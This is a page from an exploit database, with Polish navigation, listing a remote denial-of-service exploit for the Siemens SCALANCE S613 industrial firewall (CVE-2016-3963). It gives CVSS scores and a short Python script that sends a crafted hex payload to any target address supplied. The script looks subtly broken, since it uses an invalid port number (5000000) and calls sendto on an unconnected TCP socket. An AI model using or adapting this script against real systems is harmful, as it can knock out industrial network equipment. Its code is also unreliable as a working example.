Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Siemens SCALANCE S613 Denial Of Service
2018.05.25
Credit:
t4rkd3vilz
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2016-3963
CWE:
CWE-Other
Ogólna skala CVSS:
5/10
Znaczenie:
2.9/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Brak
Wpływ na integralność:
Brak
Wpływ na dostępność:
Częściowy
# Exploit Title: Siemens SCALANCE S613 - Remote Denial-of-Service Vulnerability # Date: 2018-05-23 # Exploit Author: t4rkd3vilz # Vendor Homepage: https://www.siemens.com/ # Version: SCALANCE S613 (MLFB: 6GK5613-0BA00-2AA3): All versions. # Tested on: Kali Linux # CVE: CVE-2016-3963 ################################################################# #!/usr/bin/python import socket import sys if len(sys.argv) < 2: print('Usage: ' + sys.argv[0] + ' [target]') sys.exit(1) print('Sending packet to ' + sys.argv[1] + ' ...') payload = bytearray('11 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 9E'.replace(' ', '').decode('hex')) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.sendto(payload, (sys.argv[1], 5000000))
See this note in RAW Version
Tweet
Vote for this issue:
0
-2
0%
100%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top